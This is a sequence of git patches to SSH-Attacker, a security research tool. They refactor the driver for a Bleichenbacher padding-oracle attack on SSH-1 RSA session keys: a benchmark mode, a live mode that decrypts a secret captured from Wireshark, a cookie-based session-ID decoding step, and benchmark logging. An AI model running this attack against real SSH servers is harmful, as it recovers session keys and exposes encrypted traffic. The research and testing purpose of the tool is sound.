b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index f75caffcf..57fb30367 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -24,6 +24,7 @@ import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import java.io.File; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; @@ -161,6 +162,20 @@ private void getPublicKeys() { @Override public void executeAttack() { + try { + String str = "Starting."; + File output_File = new File("benchmark_results.txt"); + FileOutputStream outputStream = new FileOutputStream(output_File, true); + byte[] strToBytes = str.getBytes(); + outputStream.write(strToBytes); + + outputStream.close(); + } catch (FileNotFoundException e) { + throw new RuntimeException(e); + } catch (IOException e) { + throw new RuntimeException(e); + } + /*if (!isVulnerable()) { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; @@ -440,7 +455,8 @@ public void executeAttack() { timeElapsed, attacker.getCounterInnerBleichenbacher(), attacker.getCounterOuterBleichenbacher()); - FileOutputStream outputStream = new FileOutputStream("benchmark_result.output"); + File output_File = new File("benchmark_results.txt"); + FileOutputStream outputStream = new FileOutputStream(output_File, true); byte[] strToBytes = str.getBytes(); outputStream.write(strToBytes); From c481144a41ee2a8c4de42a0f287e5d7e42fc1350 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 11 Nov 2023 00:07:13 +0100 Subject: [PATCH 109/176] removing comments and fixing up code; makein "encrypted_secret" optional for benchmark-mode; fixing benchmark output --- .../config/BleichenbacherCommandConfig.java | 26 +- .../attacks/impl/BleichenbacherAttacker.java | 371 +++--------------- 2 files changed, 60 insertions(+), 337 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index 01da78c20..8c6b175cb 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -13,11 +13,8 @@ import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.config.delegate.ClientDelegate; import de.rub.nds.sshattacker.core.config.delegate.GeneralDelegate; -import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.constants.ProtocolVersion; import de.rub.nds.sshattacker.core.layer.constant.LayerConfiguration; -import de.rub.nds.sshattacker.core.util.Converter; -import java.util.List; /** Config for Manger's attack */ public class BleichenbacherCommandConfig extends AttackConfig { @@ -29,16 +26,9 @@ public class BleichenbacherCommandConfig extends AttackConfig { @ParametersDelegate private final AttackDelegate attackDelegate; - @Parameter( - names = "-kex_algorithm", - required = true, - description = - "The key exchange algorithm that should be used: rsa2048-pkcs1 or rsa1024-pkcs1") - private String kexAlgorithm; - @Parameter( names = "-encrypted_secret", - required = true, + required = false, description = "Encrypted secret from the CMSG_SSH_SESSION_KEY " + " message. You can retrieve this message from the Wireshark traffic. Find the" @@ -90,20 +80,6 @@ public void setEncryptedSecret(String encryptedSecret) { this.encryptedSecret = encryptedSecret; } - public String getKexAlgorithm() { - return kexAlgorithm; - } - - public KeyExchangeAlgorithm getKeyExchangeAlgorithm() { - List list = - Converter.nameListToEnumValues(kexAlgorithm, KeyExchangeAlgorithm.class); - return list.get(0); - } - - public void setKexAlgorithm(String kexAlgorithm) { - this.kexAlgorithm = kexAlgorithm; - } - public int getNumberOfIterations() { return numberOfIterations; } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 57fb30367..8a95e6373 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -13,7 +13,6 @@ import de.rub.nds.sshattacker.attacks.config.BleichenbacherCommandConfig; import de.rub.nds.sshattacker.attacks.general.KeyFetcher; import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; -import de.rub.nds.sshattacker.attacks.padding.VectorResponse; import de.rub.nds.sshattacker.attacks.pkcs1.*; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; import de.rub.nds.sshattacker.attacks.response.EqualityError; @@ -25,13 +24,11 @@ import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.exceptions.CryptoException; import java.io.File; -import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; import java.math.BigInteger; import java.security.interfaces.RSAPublicKey; import java.util.ArrayList; -import java.util.Collections; import java.util.List; import java.util.Random; import org.apache.logging.log4j.LogManager; @@ -47,28 +44,15 @@ public class BleichenbacherAttacker extends Attacker fullResponseMap; - private EqualityError resultError; - private final ParallelExecutor executor; - - private boolean erroneousScans = false; - private KeyExchangeAlgorithm keyExchangeAlgorithm; - private List publicKeys = new ArrayList<>(); + private final List publicKeys = new ArrayList<>(); private CustomRsaPublicKey serverPublicKey, hostPublicKey; - private int counterInnerBleichenbacher; - private int counterOuterBleichenbacher; + private final int counterInnerBleichenbacher; + private final int counterOuterBleichenbacher; /** * @param bleichenbacherConfig Manger attack config @@ -90,9 +74,6 @@ public BleichenbacherAttacker( ParallelExecutor executor) { super(bleichenbacherCommandConfig, baseConfig); sshConfig = getSshConfig(); - setKeyExchangeAlgorithm(); - fullResponseMap = new ArrayList<>(); - this.executor = executor; this.counterInnerBleichenbacher = 0; this.counterOuterBleichenbacher = 0; } @@ -170,8 +151,6 @@ public void executeAttack() { outputStream.write(strToBytes); outputStream.close(); - } catch (FileNotFoundException e) { - throw new RuntimeException(e); } catch (IOException e) { throw new RuntimeException(e); } @@ -180,195 +159,19 @@ public void executeAttack() { LOGGER.warn("The server is not vulnerable to Manger's attack"); return; }*/ - // RSAPublicKey publicKey = getServerPublicKey(); - - /*if (publicKey == null) { - LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?"); - return; - }*/ - /*if (config.getEncryptedSecret() == null) { - throw new ConfigurationException("The encrypted secret must be set to be decrypted."); - } - - if (config.getKexAlgorithm() == null) { - throw new ConfigurationException("The key exchange algorithm must be set."); - }*/ - - // --UnComment FOR "NORMAL" NOES getPublicKeys(); getHostPublicKey(); - Random random = new Random(); - byte[] sessionKey = new byte[32]; - random.nextBytes(sessionKey); - getServerPublicKey(); - LOGGER.info( - String.format( - "Fetched server public key with exponent %s and modulus: %s", - hostPublicKey.getPublicExponent().toString(16), - hostPublicKey.getModulus().toString(16))); - - // ---- - - /*CustomRsaPrivateKey hostPrivatKey = - new CustomRsaPrivateKey( - new BigInteger( - "7AAB5898AEE7C451A2A90B9DE04EC947656FAB69460FF68E1E278EA1841D" - + "A22B39CA4A4FA7CEA1B8EDCB7224C38A1659D1226D2E07AF9A7C62A305AC" - + "9DEC042FBC290443B23E24C64765DE1AD58777A522BF102B1BCC5536D794" - + "62BCBE6DB8E91CD9CF6F98F62E5031BFAA9E51C93ED900579A39C26CBB64" - + "CF7E6F998513E20B4B2A4DD36D4F6F074A0FDB04232FA6EDAB89A1B32BA5" - + "2214696BDA66C4518A73F92807DD088AB11263519885A0CD6A42B6D9EAE9" - + "EBD13241EDC4EB7205AE838A5EF7AE280D36410057B38ED05CEBA75F92AC" - + "DF40226164BB3A0C4312B65A8C2FBA85CDB7CC5F77F53C45F64409AFC460" - + "210C8EE4DAB818F009172387ED00E141", - 16), - new BigInteger( - "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" - + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" - + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" - + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" - + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" - + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" - + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" - + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" - + "3F3EE64B04888B898864B08200A9E22909", - 16)); - - CustomRsaPublicKey hostPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" - + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" - + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" - + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" - + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" - + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" - + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" - + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" - + "3F3EE64B04888B898864B08200A9E22909", - 16)); - - CustomRsaPrivateKey serverPrivateKey = - new CustomRsaPrivateKey( - new BigInteger( - "64F3D28624C63EC5E0A9751FDC4B2D" - + "ADC715F0DDA9D49EF91B4C5AA03483" - + "570BA8AA01151B704335A3219E7D22" - + "2FDB9777DA68F8DF8B5CDB5DB9B0C3" - + "99CF0334044E6ED09B40E754809429" - + "F6C387B7AC7BA00ECFE7AFE4D41499" - + "B2F341FBB0496C52CBE5EB1F7E64F4" - + "BF21F72B64EE0B478EAB6A0008E07A" - + "E2F52960703D0EB9", - 16), - new BigInteger( - "00C25E6978A2B8FE2C6228024BD5D0" - + "F3239DDDDECCDF156AEF9D3F7F56AF" - + "8443C510A03C66779363C33082D04D" - + "23648B308AE0BE07A1451C8BFF0B97" - + "DCA43E5703D66B8C04BF46DDBC79A7" - + "7228179E5B246433098BF8271CCE66" - + "C5E4CB3A9E2ECEE52BB07C33F92893" - + "A5D5B6F163BE6FBC1E8E66E4666866" - + "871890105EFFE1193F", - 16)); - - CustomRsaPublicKey serverPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00C25E6978A2B8FE2C6228024BD5D0" - + "F3239DDDDECCDF156AEF9D3F7F56AF" - + "8443C510A03C66779363C33082D04D" - + "23648B308AE0BE07A1451C8BFF0B97" - + "DCA43E5703D66B8C04BF46DDBC79A7" - + "7228179E5B246433098BF8271CCE66" - + "C5E4CB3A9E2ECEE52BB07C33F92893" - + "A5D5B6F163BE6FBC1E8E66E4666866" - + "871890105EFFE1193F", - 16)); - */ - - /*// Host 1024 - CustomRsaPublicKey hostPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00C6D5D18B3BDCA91AE922941730D7" - + "BFF6F959CACC67609C571CA281148B" - + "97F8CA742B85E9FABAF308E6BFED40" - + "06B639159E19CCCD3FFF4374E905B3" - + "D4FEE6B3F8867940FDAD622FF59E7E" - + "8E7801C29D5BEB6004E1F127C1B37B" - + "5BEDFF057F06FB133A21DA77B2B9FA" - + "9E4CF72740F0049B30DC1CE23EB2B7" - + "E6E92B129E1EFE67E3", - 16)); - - CustomRsaPrivateKey hostPrivatKey = - new CustomRsaPrivateKey( - new BigInteger( - "0092FAA9AC0FB31CBA0CCE07C460D1" - + "8B5088A02C7E0E88E6E8A9FD2207CA" - + "ECAAF7150ABB31EBAAD84EA32C0AB7" - + "C27E5F1230CD878BCD9BE7047BE040" - + "3FD9B13624D9C822AB17C96615BB5A" - + "875D1A076D282B2E9035FAC37DB066" - + "82C8498BA624C77B0E1E2ECBE7AB5A" - + "5A0342E20C54482D149A7F37F8EF4A" - + "2C148CD3ADD6782189", - 16), - new BigInteger( - "00C6D5D18B3BDCA91AE922941730D7" - + "BFF6F959CACC67609C571CA281148B" - + "97F8CA742B85E9FABAF308E6BFED40" - + "06B639159E19CCCD3FFF4374E905B3" - + "D4FEE6B3F8867940FDAD622FF59E7E" - + "8E7801C29D5BEB6004E1F127C1B37B" - + "5BEDFF057F06FB133A21DA77B2B9FA" - + "9E4CF72740F0049B30DC1CE23EB2B7" - + "E6E92B129E1EFE67E3", - 16)); - - // Server 768 Bit - CustomRsaPublicKey serverPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "00CB2C65943BB603C0072D4C5AFD8B" - + "C5155D57231F02D191A079A3758BCF" - + "96E83318F0729D05437B543088D8A1" - + "73675EE40E7506EFB09EDD62C868C5" - + "27DB0768AB643AD09A7C42C6AD47DA" - + "ACE6CD53C051E26E69AF472D0CFE17" - + "322EC96499E529", - 16)); - CustomRsaPrivateKey serverPrivateKey = - new CustomRsaPrivateKey( - new BigInteger( - "00B30F82CADCC13296E7FC5D420819" - + "49EDE560A99C68208906F48D4248A1" - + "00EFCE30D9A1398FED04619390D7D3" - + "9AE0ECB7DFB6A5EC8CA6A491097680" - + "9280CB64AF1F8C8B67739CF7093B34" - + "4343419647B331CD9827953279BE6C" - + "AC31C55BA6EF01", - 16), - new BigInteger( - "00CB2C65943BB603C0072D4C5AFD8B" - + "C5155D57231F02D191A079A3758BCF" - + "96E83318F0729D05437B543088D8A1" - + "73675EE40E7506EFB09EDD62C868C5" - + "27DB0768AB643AD09A7C42C6AD47DA" - + "ACE6CD53C051E26E69AF472D0CFE17" - + "322EC96499E529", - 16));*/ + byte[] encryptedSecret; if (config.isBenchmark()) { LOGGER.info("Running in Benchmark Mode, generating encrypted Session Key"); + + Random random = new Random(); + byte[] sessionKey = new byte[32]; + random.nextBytes(sessionKey); + AbstractCipher innerEncryption; AbstractCipher outerEncryption; if (hostPublicKey.getModulus().bitLength() < serverPublicKey.getModulus().bitLength()) { @@ -386,6 +189,11 @@ public void executeAttack() { throw new RuntimeException(e); } } else { + LOGGER.info("Running in Live Mode, reading encrypted secret from commandline"); + if (config.getEncryptedSecret() == null) { + throw new ConfigurationException( + "The encrypted secret must be set to be decrypted."); + } encryptedSecret = ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); } @@ -400,121 +208,60 @@ public void executeAttack() { } catch (InterruptedException e) { throw new RuntimeException(e); } - // byte[] encryptedSecret = - // ArrayConverter.hexStringToByteArray(config.getEncryptedSecret()); - try { - /* Ssh1MockOracle oracle = - new Ssh1MockOracle( - hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey);*/ - - BleichenbacherOracle oracle = - new BleichenbacherOracle( - this.hostPublicKey, - this.serverPublicKey, - getSshConfig(), - counterInnerBleichenbacher, - counterOuterBleichenbacher); - - Bleichenbacher attacker = - new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); - - long start = System.currentTimeMillis(); - - attacker.attack(); - - long finish = System.currentTimeMillis(); - long timeElapsed = finish - start; - LOGGER.info("The attack took {} milliseconds", timeElapsed); - LOGGER.info( - "It took {} tries for the inner and {} tries for the outer Bleichenbacher-Attack", - attacker.getCounterInnerBleichenbacher(), - attacker.getCounterOuterBleichenbacher()); - BigInteger solution = attacker.getSolution(); - /* BigInteger secret = - OaepConverter.decodeSolution( - solution, - getHashInstance(), - ((RSAPublicKey) oracle.getPublicKey()).getModulus().bitLength() - / Byte.SIZE);*/ - - CONSOLE.info("Encoded Solution: " + solution); - - byte[] array = solution.toByteArray(); - if (array[0] == 0) { - byte[] tmp = new byte[array.length - 1]; - System.arraycopy(array, 1, tmp, 0, tmp.length); - array = tmp; - } + /* Ssh1MockOracle oracle = + new Ssh1MockOracle( + hostPublicKey, hostPrivatKey, serverPublicKey, serverPrivateKey);*/ - try { - String str = - String.format( - "Results: Plaintext: %s; Time: %d ms; Inner-Tries: %d; Outer-Tries: %d", - ArrayConverter.bytesToHexString(array), - timeElapsed, - attacker.getCounterInnerBleichenbacher(), - attacker.getCounterOuterBleichenbacher()); - File output_File = new File("benchmark_results.txt"); - FileOutputStream outputStream = new FileOutputStream(output_File, true); - byte[] strToBytes = str.getBytes(); - outputStream.write(strToBytes); - - outputStream.close(); - } catch (FileNotFoundException e) { - throw new RuntimeException(e); - } catch (IOException e) { - throw new RuntimeException(e); - } + BleichenbacherOracle oracle = + new BleichenbacherOracle( + this.hostPublicKey, + this.serverPublicKey, + getSshConfig(), + counterInnerBleichenbacher, + counterOuterBleichenbacher); - // CONSOLE.info("Decoded Secret: " + secret); - } /*catch (NoSuchPaddingException e) { - throw new RuntimeException(e); - } catch (NoSuchAlgorithmException e) { - throw new RuntimeException(e); - } catch (InvalidKeyException e) { - throw new RuntimeException(e); - }*/ finally { + Bleichenbacher attacker = + new Bleichenbacher(encryptedSecret, oracle, hostPublicKey, serverPublicKey); - } + long start = System.currentTimeMillis(); - /* RealDirectMessagePkcs1Oracle oracle = - new RealDirectMessagePkcs1Oracle( - publicKey, getSshConfig(), extractValidFingerprint(publicKey), null); - Bleichenbacher attacker = new Bleichenbacher(encryptedSecret, oracle); attacker.attack(); - BigInteger solution = attacker.getSolution(); - BigInteger secret = - OaepConverter.decodeSolution( - solution, - getHashInstance(), - ((RSAPublicKey) oracle.getPublicKey()).getModulus().bitLength() - / Byte.SIZE);*/ - - /*CONSOLE.info("Encoded Solution: " + solution); - CONSOLE.info("Decoded Secret: " + secret);*/ - } - - private void setKeyExchangeAlgorithm() { - if (config.getKexAlgorithm() == null) { - throw new ConfigurationException("The key exchange algorithm must be set."); - } else { - if (config.getKexAlgorithm().equals("rsa2048-sha256")) { - keyExchangeAlgorithm = KeyExchangeAlgorithm.RSA2048_SHA256; - } else if (config.getKexAlgorithm().equals("rsa1024-sha1")) { - keyExchangeAlgorithm = KeyExchangeAlgorithm.RSA1024_SHA1; - } else { - throw new ConfigurationException( - "Unknown key exchange algorithm, did you mistype it? " - + "Options are rsa2048-sha256 and rsa1024-sha1"); - } + long finish = System.currentTimeMillis(); + long timeElapsed = finish - start; + LOGGER.info("The attack took {} milliseconds", timeElapsed); + LOGGER.info( + "It took {} tries for the inner and {} tries for the outer Bleichenbacher-Attack", + attacker.getCounterInnerBleichenbacher(), + attacker.getCounterOuterBleichenbacher()); + BigInteger solution = attacker.getSolution(); + CONSOLE.info("Decoded Solution: " + solution); + + // Trasfer big-Integer back to byte-array, remove leading 0 if present. + byte[] solutionByteArray = solution.toByteArray(); + if (solutionByteArray[0] == 0) { + byte[] tmp = new byte[solutionByteArray.length - 1]; + System.arraycopy(solutionByteArray, 1, tmp, 0, tmp.length); + solutionByteArray = tmp; } - // Set only supported key exchange algorithm to the one specified by the user - sshConfig.setClientSupportedKeyExchangeAlgorithms( - new ArrayList<>(Collections.singleton(keyExchangeAlgorithm))); + try { + String str = + String.format( + "Results: Plaintext: %s; Time: %d ms; Inner-Tries: %d; Outer-Tries: %d ", + ArrayConverter.bytesToHexString(solutionByteArray), + timeElapsed, + attacker.getCounterInnerBleichenbacher(), + attacker.getCounterOuterBleichenbacher()); + File output_File = new File("benchmark_results.txt"); + FileOutputStream outputStream = new FileOutputStream(output_File, true); + byte[] strToBytes = str.getBytes(); + outputStream.write(strToBytes); - CONSOLE.info("Set key exchange algorithm to: " + keyExchangeAlgorithm); + outputStream.close(); + } catch (IOException e) { + throw new RuntimeException(e); + } } } From 4fe5d0699dcc6376f88cd82cf91bf95209c5b651 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 13 Nov 2023 22:09:44 +0100 Subject: [PATCH 110/176] Cleaning Up Code --- .../attacks/general/KeyFetcher.java | 27 +++---------------- .../ServerPublicKeyMessagePreparator.java | 18 ------------- 2 files changed, 3 insertions(+), 42 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java index 0816c5aca..5e1596ca4 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java @@ -171,7 +171,6 @@ public static List fetchRsaSsh1Keys(Config config) { public static List fetchRsaSsh1Keys( Config config, int attempt, int maxAttempts) { WorkflowConfigurationFactory factory = new WorkflowConfigurationFactory(config); - LOGGER.debug("Fetchng keys"); WorkflowTrace trace = factory.createWorkflowTrace( @@ -181,8 +180,9 @@ public static List fetchRsaSsh1Keys( trace.addSshAction(receiveAction); DisconnectMessageSSH1 disconnectMessage = new DisconnectMessageSSH1(); - disconnectMessage.setDisconnectReason("cusIcan"); - VariableModification newValue = StringModificationFactory.explicitValue("youKnow"); + disconnectMessage.setDisconnectReason("fetching Keys"); + VariableModification newValue = + StringModificationFactory.explicitValue("fetching Keys"); disconnectMessage.getDisconnectReason().setModification(newValue); LOGGER.debug(disconnectMessage.getDisconnectReason()); @@ -197,27 +197,6 @@ public static List fetchRsaSsh1Keys( workflowExecutor.executeWorkflow(); - /* try { - workflowExecutor.executeWorkflow(); - - if (!state.getSshContext().getTransportHandler().isClosed()) { - LOGGER.debug("Running into"); - state.getSshContext().getTransportHandler().closeConnection(); - } - } catch (IOException e) { - if (attempt < maxAttempts) { - LOGGER.debug( - String.format( - "Encountered IOException on socket in attempt %d, retrying...", - attempt)); - return fetchRsaTransientKey(config, attempt + 1, maxAttempts, version); - } else { - LOGGER.warn("Could not fetch server's RSA host key, encountered IOException"); - LOGGER.debug(e); - return null; - } - }*/ - List> receivedMessages = receiveAction.getReceivedMessages(); LOGGER.info(receivedMessages.size()); LOGGER.info(receivedMessages.get(0).toString()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java index bc134be1a..6f85580f8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ServerPublicKeyMessagePreparator.java @@ -59,24 +59,6 @@ public void prepareHostKey() { } } - /* - SshPublicKey opt_hostKey = chooser.getConfig().getHostKeys().get(7); - - CustomRsaPublicKey publicKey = (CustomRsaPublicKey) opt_hostKey.getPublicKey(); - - if (!opt_hostKey.getPrivateKey().isPresent()) { - LOGGER.warn("no privat key defined for hostkey"); - } - if (opt_hostKey.getPublicKeyFormat().getName().equals(PublicKeyFormat.SSH_RSA.getName())) { - LOGGER.warn( - "the Host-Key is not formated as RSA Key-Type, it is {}", - opt_hostKey.getPublicKeyFormat().getName()); - } - CustomRsaPrivateKey privateKey = (CustomRsaPrivateKey) opt_hostKey.getPrivateKey().get(); - - SshPublicKey hostKey = - new SshPublicKey<>(PublicKeyFormat.SSH_RSA, publicKey, privateKey); - */ getObject().setHostKey(this.hostkey); chooser.getContext().getSshContext().setHostKey(this.hostkey); From 795f15c5cd7669a8958395b2c16c9278e7efea76 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 13 Nov 2023 22:09:56 +0100 Subject: [PATCH 111/176] Add Cookie-option for cli --- .../config/BleichenbacherCommandConfig.java | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index 8c6b175cb..7f3aea6c1 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -35,6 +35,12 @@ public class BleichenbacherCommandConfig extends AttackConfig { + " secret message, right click on the \"Encrypted Secret\" value and copy this value as a Hex Stream.") private String encryptedSecret; + @Parameter( + names = {"-cookie", "-b"}, + required = false, + description = "Cookie for SessionID Calculation") + private String cookie; + @Parameter( names = {"-benchmark", "-b"}, description = @@ -95,4 +101,12 @@ public boolean isBenchmark() { public void setBenchmark(boolean benchmark) { this.benchmark = benchmark; } + + public String getCookie() { + return cookie; + } + + public void setCookie(String cookie) { + this.cookie = cookie; + } } From a67dd58b251699ad2e904acba61096d762b631a9 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 13 Nov 2023 22:10:21 +0100 Subject: [PATCH 112/176] Decoding Solution if cookie given and ading a json-style benchmark output --- .../attacks/impl/BleichenbacherAttacker.java | 108 ++++++++++++++---- 1 file changed, 83 insertions(+), 25 deletions(-) diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 8a95e6373..000144496 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -9,6 +9,7 @@ import static de.rub.nds.tlsattacker.util.ConsoleLogger.CONSOLE; +import com.google.common.primitives.Bytes; import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.attacks.config.BleichenbacherCommandConfig; import de.rub.nds.sshattacker.attacks.general.KeyFetcher; @@ -27,8 +28,11 @@ import java.io.FileOutputStream; import java.io.IOException; import java.math.BigInteger; +import java.security.MessageDigest; +import java.security.NoSuchAlgorithmException; import java.security.interfaces.RSAPublicKey; import java.util.ArrayList; +import java.util.Arrays; import java.util.List; import java.util.Random; import org.apache.logging.log4j.LogManager; @@ -143,16 +147,18 @@ private void getPublicKeys() { @Override public void executeAttack() { - try { - String str = "Starting."; - File output_File = new File("benchmark_results.txt"); - FileOutputStream outputStream = new FileOutputStream(output_File, true); - byte[] strToBytes = str.getBytes(); - outputStream.write(strToBytes); - - outputStream.close(); - } catch (IOException e) { - throw new RuntimeException(e); + if (config.isBenchmark()) { + try { + String str = "Starting."; + File output_File = new File("benchmark_results.txt"); + FileOutputStream outputStream = new FileOutputStream(output_File, true); + byte[] strToBytes = str.getBytes(); + outputStream.write(strToBytes); + + outputStream.close(); + } catch (IOException e) { + throw new RuntimeException(e); + } } /*if (!isVulnerable()) { @@ -236,7 +242,6 @@ public void executeAttack() { attacker.getCounterInnerBleichenbacher(), attacker.getCounterOuterBleichenbacher()); BigInteger solution = attacker.getSolution(); - CONSOLE.info("Decoded Solution: " + solution); // Trasfer big-Integer back to byte-array, remove leading 0 if present. byte[] solutionByteArray = solution.toByteArray(); @@ -246,22 +251,75 @@ public void executeAttack() { solutionByteArray = tmp; } + CONSOLE.info("Decoded Solution: " + ArrayConverter.bytesToHexString(solutionByteArray)); + + if (config.getCookie() != null) { + byte[] cookieBytes = config.getCookie().getBytes(); + byte[] sessionID = calculateSessionID(cookieBytes); + int i = 0; + for (byte sesseionByte : sessionID) { + solutionByteArray[i] = (byte) (sesseionByte ^ solutionByteArray[i++]); + } + } + + if (config.isBenchmark()) { + try { + String str = + String.format( + "{" + + " \"Plaintext\": \"%s\"," + + " \"Ciphertext\": \"%s\"," + + " \"Time\": \"%d\",\n" + + " \"Inner-Tries\": \"%d\"," + + " \"Outer-Tries\": \"%d\"," + + " \"serverkey_lenght\": \"%d\"," + + " \"hostkey_lenght\": \"%d\"" + + "}", + ArrayConverter.bytesToHexString(solutionByteArray), + ArrayConverter.bytesToHexString(encryptedSecret), + timeElapsed, + attacker.getCounterInnerBleichenbacher(), + attacker.getCounterOuterBleichenbacher(), + serverPublicKey.getModulus().bitLength(), + hostPublicKey.getModulus().bitLength()); + File output_File = new File("benchmark_results.txt"); + FileOutputStream outputStream = new FileOutputStream(output_File, true); + byte[] strToBytes = str.getBytes(); + outputStream.write(strToBytes); + + outputStream.close(); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + } + + private byte[] calculateSessionID(byte[] cookie) { + byte[] serverModulus; + byte[] hostModulus; + + serverModulus = serverPublicKey.getModulus().toByteArray(); + hostModulus = hostPublicKey.getModulus().toByteArray(); + + // Remove sign-byte if present + if (hostModulus[0] == 0) { + hostModulus = Arrays.copyOfRange(hostModulus, 1, hostModulus.length); + } + if (serverModulus[0] == 0) { + serverModulus = Arrays.copyOfRange(serverModulus, 1, serverModulus.length); + } + + MessageDigest md = null; try { - String str = - String.format( - "Results: Plaintext: %s; Time: %d ms; Inner-Tries: %d; Outer-Tries: %d ", - ArrayConverter.bytesToHexString(solutionByteArray), - timeElapsed, - attacker.getCounterInnerBleichenbacher(), - attacker.getCounterOuterBleichenbacher()); - File output_File = new File("benchmark_results.txt"); - FileOutputStream outputStream = new FileOutputStream(output_File, true); - byte[] strToBytes = str.getBytes(); - outputStream.write(strToBytes); - - outputStream.close(); - } catch (IOException e) { + md = MessageDigest.getInstance("MD5"); + } catch (NoSuchAlgorithmException e) { throw new RuntimeException(e); } + md.update(Bytes.concat(hostModulus, serverModulus, cookie)); + // md.update(Bytes.concat(serverModulus, hostModulus, cookie)); + byte[] sessionID = md.digest(); + LOGGER.debug("Session-ID {}", ArrayConverter.bytesToHexString(sessionID)); + + return sessionID; } } From 9ec5b1c7c5c3db3487578616dd474db41db9f2d7 Mon Sep 17 00:00:00 